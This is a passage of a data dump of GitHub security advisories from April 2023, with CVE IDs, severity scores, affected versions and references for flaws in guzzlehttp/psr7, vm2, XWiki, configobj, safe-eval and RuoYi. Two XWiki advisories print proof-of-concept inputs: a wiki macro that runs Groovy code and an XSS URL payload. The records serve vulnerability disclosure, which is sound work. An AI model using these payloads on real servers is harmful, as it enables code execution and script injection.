[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-p379-cxqh-q822'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30839'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/0f2a9b7fdd42d1dd3b21d4fad586a849642f3c30'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/d1d27dc371599713c912b71bc2a455cacd7f2149'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/releases/tag/1.7.8.9'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/releases/tag/8.0.4'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-25T19:45:58Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wxmh-65f7-jcvw
|
2023-04-19T18:25:53Z
|
2023-04-19T18:25:53Z
| null |
['CVE-2023-29197']
|
Improper header name validation in guzzlehttp/psr7
|
### Impact
Improper header parsing. An attacker could sneak in a newline (`\n`) into both the header names and values. While the specification states that `\r\n\r\n` is used to terminate the header list, many servers in the wild will also accept `\n\n`.
### Patches
The issue is patched in 1.9.1 and 2.4.5.
### Workarounds
There are no known workarounds.
### References
* https://www.rfc-editor.org/rfc/rfc7230#section-3.2.4
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'guzzlehttp/psr7'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'guzzlehttp/psr7'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.4.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/guzzle/psr7/security/advisories/GHSA-q7rv-6hp3-vh96'}, {'type': 'WEB', 'url': 'https://github.com/guzzle/psr7/security/advisories/GHSA-wxmh-65f7-jcvw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29197'}, {'type': 'WEB', 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24775'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/guzzlehttp/psr7/CVE-2023-29197.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/guzzle/psr7'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/FJANWDXJZE5BGLN4MQ4FEHV5LJ6CMKQF/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/O35UN4IK6VS2LXSRWUDFWY7NI73RKY2U/'}, {'type': 'WEB', 'url': 'https://www.rfc-editor.org/rfc/rfc7230#section-3.2.4'}]
|
{'cwe_ids': ['CWE-436'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-19T18:25:53Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-xj72-wvfv-8985
|
2023-04-14T21:35:01Z
|
2023-04-12T20:42:44Z
| null |
['CVE-2023-29199']
|
vm2 Sandbox Escape vulnerability
|
There exists a vulnerability in source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass `handleException()` and leak unsanitized host exceptions which can be used to escape the sandbox and run arbitrary code in host context.
### Impact
A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.
### Patches
This vulnerability was patched in the release of version `3.9.16` of `vm2`.
### Workarounds
None.
### References
Github Issue - https://github.com/patriksimek/vm2/issues/516
PoC - https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [VM2](https://github.com/patriksimek/vm2)
Thanks to [Xion](https://twitter.com/0x10n) (SeungHyun Lee) of [KAIST Hacking Lab](https://kaist-hacking.github.io/) for disclosing this vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'vm2'}, 'ecosystem_specific': {'affected_functions': ['vm2.run']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.16'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/security/advisories/GHSA-xj72-wvfv-8985'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29199'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/issues/516'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/commit/24c724daa7c09f003e556d7cd1c7a8381cb985d7'}, {'type': 'WEB', 'url': 'https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c'}, {'type': 'PACKAGE', 'url': 'https://github.com/patriksimek/vm2'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/releases/tag/3.9.16'}]
|
{'cwe_ids': ['CWE-913'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:42:44Z', 'nvd_published_at': '2023-04-14T19:15:00Z'}
|
1.4.0
|
GHSA-c5f4-p5wv-2475
|
2023-04-26T20:33:28Z
|
2023-04-12T20:35:37Z
| null |
['CVE-2023-29212']
|
xwiki.platform:xwiki-platform-panels-ui Eval Injection vulnerability
|
### Impact
Any user with edit rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the included pages in the included documents edit panel.
A proof of concept exploit is to edit a document and add the following code before saving.
```
{{display reference="{{cache~}~}{{groovy~}~}println(~"Hello from Groovy~" + ~" in included document!~"){{/groovy~}~}{{/cache~}~}"/}}
```
**expected**
The right had side panels contain:
```
One included page:
{{cache}}{{groovy}}println("Hello from Groovy" + " in included document!"){{/groovy}}{{/cache}}
```
**actual**
The right had side panels contain:
```
One included page:
XWiki.Hello from Groovy in included document!
```
### Patches
The problem has been patched on XWiki 14.4.7, and 14.10.
### Workarounds
The issue can be fixed manually applying this [patch](https://github.com/xwiki/xwiki-platform/commit/22f249a0eb9f2a64214628217e812a994419b69f#diff-a51a252f0190274464027342b4e3eafc4ae32de4d9c17ef166e54fc5454c5689R214-R217).
### References
- https://github.com/xwiki/xwiki-platform/commit/22f249a0eb9f2a64214628217e812a994419b69f#diff-a51a252f0190274464027342b4e3eafc4ae32de4d9c17ef166e54fc5454c5689R214-R217
- https://jira.xwiki.org/browse/XWIKI-20293
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-c5f4-p5wv-2475'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29212'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/22f249a0eb9f2a64214628217e812a994419b69f#diff-a51a252f0190274464027342b4e3eafc4ae32de4d9c17ef166e54fc5454c5689R214-R217'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20293'}]
|
{'cwe_ids': ['CWE-94', 'CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:35:37Z', 'nvd_published_at': '2023-04-16T07:15:00Z'}
|
1.4.0
|
GHSA-c33w-24p9-8m24
|
2023-04-04T21:40:45Z
|
2023-04-03T06:30:19Z
| null |
['CVE-2023-26112']
|
configobj ReDoS exploitable by developer using values in a server-side configuration file
|
All versions of the package configobj are vulnerable to Regular Expression Denial of Service (ReDoS) via the validate function, using (.+?)\((.*)\). **Note:** This is only exploitable in the case of a developer, putting the offending value in a server side configuration file.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'configobj'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.0.8'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26112'}, {'type': 'WEB', 'url': 'https://github.com/DiffSK/configobj/issues/232'}, {'type': 'PACKAGE', 'url': 'https://github.com/DiffSK/configobj'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-PYTHON-CONFIGOBJ-3252494'}]
|
{'cwe_ids': ['CWE-1333'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-04-04T21:40:45Z', 'nvd_published_at': '2023-04-03T05:15:00Z'}
|
1.4.0
|
GHSA-jjm5-5v9v-7hx2
|
2023-04-26T20:33:32Z
|
2023-04-12T20:36:19Z
| null |
['CVE-2023-29506']
|
org.xwiki.platform:xwiki-platform-security-authentication-default XSS with authenticate endpoints
|
### Impact
It was possible to inject some code using the URL of authenticate endpoints, e.g.:
```
https://hostname/xwiki/authenticate/wiki/xwiki%22onload=%22alert(origin)%22/resetpassword
```
This vulnerability was present in recent versions of XWiki:
- 13.10.8+
- 14.4.3+
- 14.6+
### Patches
This problem has been patched on XWiki 13.10.11, 14.4.7 and 14.10.
### Workarounds
There is no easy workaround except to upgrade.
### References
- https://jira.xwiki.org/browse/XWIKI-20335
- https://github.com/xwiki/xwiki-platform/commit/1943ea26c967ef868fb5f67c487d98d97cba0380
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira](https://jira.xwiki.org)
* Email us at [security mailing-list](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-security-authentication-default'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.10.8'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-security-authentication-default'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.4.3'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-security-authentication-default'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.6'}, {'fixed': '14.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-jjm5-5v9v-7hx2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29506'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/1943ea26c967ef868fb5f67c487d98d97cba0380'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20335'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:36:19Z', 'nvd_published_at': '2023-04-16T07:15:00Z'}
|
1.4.0
|
GHSA-79xf-67r4-q2jj
|
2023-04-19T17:10:20Z
|
2023-04-11T06:30:29Z
| null |
['CVE-2023-26122']
|
safe-eval vulnerable to Sandbox Bypass due to improper input sanitization
|
All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution (RCE).
**Vulnerable functions:**
__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'safe-eval'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26122'}, {'type': 'WEB', 'url': 'https://github.com/hacksparrow/safe-eval/issues/27'}, {'type': 'WEB', 'url': 'https://github.com/hacksparrow/safe-eval/issues/31'}, {'type': 'WEB', 'url': 'https://github.com/hacksparrow/safe-eval/issues/32'}, {'type': 'WEB', 'url': 'https://github.com/hacksparrow/safe-eval/issues/33'}, {'type': 'WEB', 'url': 'https://github.com/hacksparrow/safe-eval/issues/34'}, {'type': 'WEB', 'url': 'https://github.com/hacksparrow/safe-eval/issues/35'}, {'type': 'WEB', 'url': 'https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce'}, {'type': 'PACKAGE', 'url': 'https://github.com/hacksparrow/safe-eval'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SAFEEVAL-3373064'}]
|
{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-11T15:27:27Z', 'nvd_published_at': '2023-04-11T05:15:00Z'}
|
1.4.0
|
GHSA-h4c9-rr5m-32fm
|
2023-04-07T21:01:39Z
|
2023-04-02T03:30:16Z
| null |
['CVE-2023-27025']
|
RuoYi vulnerable to arbitrary file download
|
An arbitrary file download vulnerability in the background management module of RuoYi v4.7.6 and below allows attackers to download arbitrary files in the server.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.ruoyi:ruoyi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27025'}, {'type': 'PACKAGE', 'url': 'https://gitee.com/y_project/RuoYi/'}, {'type': 'WEB', 'url': 'https://gitee.com/y_project/RuoYi/commit/432d5ce1be2e9384a6230d7ccd8401eef5ce02b0'}, {'type': 'WEB', 'url': 'https://gitee.com/y_project/RuoYi/issues/I697Q5'}]
|
{'cwe_ids': ['CWE-494'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T21:01:39Z', 'nvd_published_at': '2023-04-02T01:15:00Z'}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.